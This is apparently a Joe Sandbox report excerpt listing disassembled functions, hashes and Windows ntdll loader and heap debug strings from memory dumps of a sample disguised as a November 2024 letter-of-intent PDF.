                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                      • API String ID: 3446177414-4227709934
                                                                                      • Opcode ID: 59b3fe0440133eb67f862b1b53c591aa7597444c37d1d58582dd9b9f7831f2b4
                                                                                      • Instruction ID: 9daab7166632b9b5c416c733274728294c637d750093f889116143a8f6e6920a
                                                                                      • Opcode Fuzzy Hash: 59b3fe0440133eb67f862b1b53c591aa7597444c37d1d58582dd9b9f7831f2b4
                                                                                      • Instruction Fuzzy Hash: D0416EB9900249ABEB01DF99C980ADEBBF5FF88754F140299E904B7341D771D912DFA0
                                                                                      Function 3303FD78 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                      • API String ID: 3446177414-3492000579
                                                                                      • Opcode ID: ae19bbdb92120dfffd9a64f098494d42544b282704479804bf3f1d7032963fcf
                                                                                      • Instruction ID: f01c341f459982fe7ee5edcee2dc06490feb0c95fdfdc609f58ac54f20d54620
                                                                                      • Opcode Fuzzy Hash: ae19bbdb92120dfffd9a64f098494d42544b282704479804bf3f1d7032963fcf
                                                                                      • Instruction Fuzzy Hash: F171FF35912284DFDB01DF68C440BAEFBF2FF4A324F088599E985AB252CB759981CF54
                                                                                      Function 32F865B5 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32FE9AF6
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 32FE9AC5, 32FE9B06
                                                                                      • LdrpLoadShimEngine, xrefs: 32FE9ABB, 32FE9AFC
                                                                                      • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32FE9AB4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 3446177414-3589223738
                                                                                      • Opcode ID: ee3d64beeecf6041ecfcac0f7c23ad18017a11f4c194cb98d5c0592cfa9f53a2
                                                                                      • Instruction ID: 6b9620587b3081bc12e2033dee9c9224062beed61baf897cdff10e505b56d407
                                                                                      • Opcode Fuzzy Hash: ee3d64beeecf6041ecfcac0f7c23ad18017a11f4c194cb98d5c0592cfa9f53a2
                                                                                      • Instruction Fuzzy Hash: 2651E476A0035C9FEB14EBA8C854B9DB7F6BB44308F050965EA45BF295DBB0AC41CB90
                                                                                      Function 32FDB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: __aulldvrm
                                                                                      • String ID: +$-$0$0
                                                                                      • API String ID: 1302938615-699404926
                                                                                      • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                      • Instruction ID: c79dab3aaafa967a56e046e3425800f69b739e235beb51bfbd3d0d2a7be2ef35
                                                                                      • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                      • Instruction Fuzzy Hash: 3081E4B9E453498FEF04CF64C891BEEBBB1AF45354F5C4A59DA60A72D8CB348841CB50
                                                                                      Function 32F99126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: $$@
                                                                                      • API String ID: 3446177414-1194432280
                                                                                      • Opcode ID: 9ecb7027490261b2683959d4dcd7aa118b94cc8ce0ceac8f31278261746d0360
                                                                                      • Instruction ID: 4cab6a03fa7080f7a27318d0e3ef65fe2002f1ce4e8d96cd33186f7531ac67f2
                                                                                      • Opcode Fuzzy Hash: 9ecb7027490261b2683959d4dcd7aa118b94cc8ce0ceac8f31278261746d0360
                                                                                      • Instruction Fuzzy Hash: C9813C75D002699BEB21CF54CC44BDEB7B8AF08754F0145EAEA09B7290D7719E84CFA0
                                                                                      Function 32FC4D1D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 3300365C
                                                                                      • LdrpFindDllActivationContext, xrefs: 33003636, 33003662
                                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 33003640, 3300366C
                                                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 3300362F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                      • API String ID: 3446177414-3779518884
                                                                                      • Opcode ID: 1da7732cc6071995bc35e816e20d614e1c6c2a94085f4c12c5331ffd208c279d
                                                                                      • Instruction ID: 9e06e562ee38c4ac966ca034f4850e5ae9eaec80cb7dd1858a9e22efdd72ccd2
                                                                                      • Opcode Fuzzy Hash: 1da7732cc6071995bc35e816e20d614e1c6c2a94085f4c12c5331ffd208c279d
                                                                                      • Instruction Fuzzy Hash: 8D31FBB6D00F33AAFB11BA14C844B5973A4BB01798F4649A6EF17A7260DF609C80CBD5
                                                                                      Function 32FB245A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 32FFA992
                                                                                      • LdrpDynamicShimModule, xrefs: 32FFA998
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 32FFA9A2
                                                                                      • apphelp.dll, xrefs: 32FB2462
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 0-176724104
                                                                                      • Opcode ID: 37c106638d6e91243253f9d221f3770d05acba528e1ce2476a97b0b28886f8f6
                                                                                      • Instruction ID: 7f5a5614b322f2a218e87be0c4f8c91d42b88bd8b16dd2e312a4ee857ac333f7
                                                                                      • Opcode Fuzzy Hash: 37c106638d6e91243253f9d221f3770d05acba528e1ce2476a97b0b28886f8f6
                                                                                      • Instruction Fuzzy Hash: E2311C76600305FBE724AF69C980F5A77F4FB84B54F160999EE047F261DB719942CB80
                                                                                      Function 330420E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___swprintf_l
                                                                                      • String ID: %%%u$[$]:%u
                                                                                      • API String ID: 48624451-2819853543
                                                                                      • Opcode ID: 8e2f71a794e94dafe3e3afd4ceb671874019481afe54ef93716fa968dfb9349c
                                                                                      • Instruction ID: f45a9632d169fe70e406cd51fd7cb215e1ed90f6bc4d30e5af47bf6ffdedffa4
                                                                                      • Opcode Fuzzy Hash: 8e2f71a794e94dafe3e3afd4ceb671874019481afe54ef93716fa968dfb9349c
                                                                                      • Instruction Fuzzy Hash: B02153B6A00119ABD710DF69CC50AAEB7ECAF54740F480566EA05E3210EB70DA01CBA1
                                                                                      Function 32F8F910 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                      • API String ID: 3446177414-3610490719
                                                                                      • Opcode ID: 85bcb6046316d4f041b655b85e9a1cfc52d80dbef09f838af8f9e980182495ba
                                                                                      • Instruction ID: 769d6e56e650910041459e7133982e079b826b4c142b1c42d706e8ee00d6bff5
                                                                                      • Opcode Fuzzy Hash: 85bcb6046316d4f041b655b85e9a1cfc52d80dbef09f838af8f9e980182495ba
                                                                                      • Instruction Fuzzy Hash: 4C911272704741DFE316DF24C894B2AF7A5AF84768F400E69EB529B290DB74E841CBD2
                                                                                      Function 32FB0BCB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      • LdrpCheckModule, xrefs: 32FFA117
                                                                                      • Failed to allocated memory for shimmed module list, xrefs: 32FFA10F
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 32FFA121
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 3446177414-161242083
                                                                                      • Opcode ID: 3a24e4b3c4f4db11d0500ac7a2ec8a0dbf4999bdfe6622009f0c14007d27d9a2
                                                                                      • Instruction ID: 40f8816c72daea7a4ec9879f25f89adc7e88125385c9193835f7aeab4e6c04d9
                                                                                      • Opcode Fuzzy Hash: 3a24e4b3c4f4db11d0500ac7a2ec8a0dbf4999bdfe6622009f0c14007d27d9a2
                                                                                      • Instruction Fuzzy Hash: A47102B5A00209DFEB08DF69C980BAEB7F4FF48704F15496DDA05EB210EB31A946CB40
                                                                                      Function 32FB9803 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                      • API String ID: 3446177414-2283098728
                                                                                      • Opcode ID: edaaad8f67611d8f9073aea98185822f91f3bac016bcf1252be67f9a397ead47
                                                                                      • Instruction ID: c57be91e18394ce93bc5e479a2cce90a3e8cf9819b46dbc511e24ae8eeb98088
                                                                                      • Opcode Fuzzy Hash: edaaad8f67611d8f9073aea98185822f91f3bac016bcf1252be67f9a397ead47
                                                                                      • Instruction Fuzzy Hash: F751D0767047029FEB14DF26C890F19B7A1BF88314F440E69EB959B691DBB0E805CF81
                                                                                      Function 32FCC720 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 330082DE
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 330082E8
                                                                                      • Failed to reallocate the system dirs string !, xrefs: 330082D7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 3446177414-1783798831
                                                                                      • Opcode ID: 5131e0ff6c664f50d0ce99d8251c16af2d22a07788f6179eee24a4c9b542d58e
                                                                                      • Instruction ID: f79f48709183a914003baf7f3cbdc83e83334ca6d2d7f884093f350dfba7630c
                                                                                      • Opcode Fuzzy Hash: 5131e0ff6c664f50d0ce99d8251c16af2d22a07788f6179eee24a4c9b542d58e
                                                                                      • Instruction Fuzzy Hash: C641C1B6504319ABE710EB64CD80B5B77E8EF84B50F014D3AFA48EB250EB70D811CB92
                                                                                      Function 32FCBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • RTL: Re-Waiting, xrefs: 33007BAC
                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 33007B7F
                                                                                      • RTL: Resource at %p, xrefs: 33007B8E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                      • API String ID: 0-871070163
                                                                                      • Opcode ID: 4db4d4c6b9fe252a0286e302fb6c8b5ca587afe7c67c5fc56eb030769b1eed50
                                                                                      • Instruction ID: 02010c119a0775b002785d95e5a6547e70085573278b1ae48ea8db85a452f21e
                                                                                      • Opcode Fuzzy Hash: 4db4d4c6b9fe252a0286e302fb6c8b5ca587afe7c67c5fc56eb030769b1eed50
                                                                                      • Instruction Fuzzy Hash: E541BC39B407139BE714CE25D840B5AB7E5EF88721F000A6DFA5A9B780DB71E805CB91
                                                                                      Function 32FCB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 3300728C
                                                                                      Strings
                                                                                      • RTL: Re-Waiting, xrefs: 330072C1
                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 33007294
                                                                                      • RTL: Resource at %p, xrefs: 330072A3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                      • API String ID: 885266447-605551621
                                                                                      • Opcode ID: 8dffc30cf1e14d5baa2345582a8330a42f1f4563ad098e52e208821f2f2742b6
                                                                                      • Instruction ID: 20a4856740e1294c503833cc53c906442253f2b29cca4a68fdba5b79b9c13a8d
                                                                                      • Opcode Fuzzy Hash: 8dffc30cf1e14d5baa2345582a8330a42f1f4563ad098e52e208821f2f2742b6
                                                                                      • Instruction Fuzzy Hash: 23412E3AB04316ABE710CE24CD40B5AB7E5FF94B54F140A69FA54EB280DB35E816CBD0
                                                                                      Function 33014755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      • LdrpCheckRedirection, xrefs: 3301488F
                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 33014899
                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 33014888
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                      • API String ID: 3446177414-3154609507
                                                                                      • Opcode ID: f631ac17289ccb991013ed3ae6c50dab3323d2e538bb8fce81fc4ae3002e2bef
                                                                                      • Instruction ID: cff8abdb8e535a8457b77101dbde10965c114179d63e424fbf7ccb0ff48e2971
                                                                                      • Opcode Fuzzy Hash: f631ac17289ccb991013ed3ae6c50dab3323d2e538bb8fce81fc4ae3002e2bef
                                                                                      • Instruction Fuzzy Hash: B541927EE047519FDB11CE58C940A1B77F8EF89690F0905E9ED88AB321D770D8A1CB91
                                                                                      Function 33042300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___swprintf_l
                                                                                      • String ID: %%%u$]:%u
                                                                                      • API String ID: 48624451-3050659472
                                                                                      • Opcode ID: 8d2642197f52f64c5d51a314b5b27769c973e14ee29a8d8c307d28c1ff512f63
                                                                                      • Instruction ID: 084689d369f6180ec9745910e26b6a3104c887ed0b3ddfe50c5195614c646c6d
                                                                                      • Opcode Fuzzy Hash: 8d2642197f52f64c5d51a314b5b27769c973e14ee29a8d8c307d28c1ff512f63
                                                                                      • Instruction Fuzzy Hash: C9316676A006199FDB10CF29DC40BEEB7FCEB44751F8545A6E949E3240EB30AA458FA4
                                                                                      Function 33015F10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: Wow64 Emulation Layer
                                                                                      • API String ID: 3446177414-921169906
                                                                                      • Opcode ID: 1323a72c7c1c374ec114c5101d9b34fcef4fc73482d1d0c42d2c4e66865255b0
                                                                                      • Instruction ID: 186041a972322463365ac4beb57416759d26acc972c7bdb0d2bd90b5ec9c56e2
                                                                                      • Opcode Fuzzy Hash: 1323a72c7c1c374ec114c5101d9b34fcef4fc73482d1d0c42d2c4e66865255b0
                                                                                      • Instruction Fuzzy Hash: FB21F97690011DBFEF01AAA4CD84CBF7B7DEF447D8F0408A8FA55A6250E6319E15AB70
                                                                                      Function 32FBEF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2b6e1c2f9a0357b70bfb740d31dbb38605beacabb67d4ce839ecb0dc47ba64b6
                                                                                      • Instruction ID: 58f0e60b30fcb887572fd1e315273ffd3e96b44c2b7cd5cb882491b36e6fd560
                                                                                      • Opcode Fuzzy Hash: 2b6e1c2f9a0357b70bfb740d31dbb38605beacabb67d4ce839ecb0dc47ba64b6
                                                                                      • Instruction Fuzzy Hash: 7EE1E575E00708DFEF15CFAAC980A8DBBF1BF48354F104A6AEA45A7660DB71A941CF50
                                                                                      Function 3300EF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
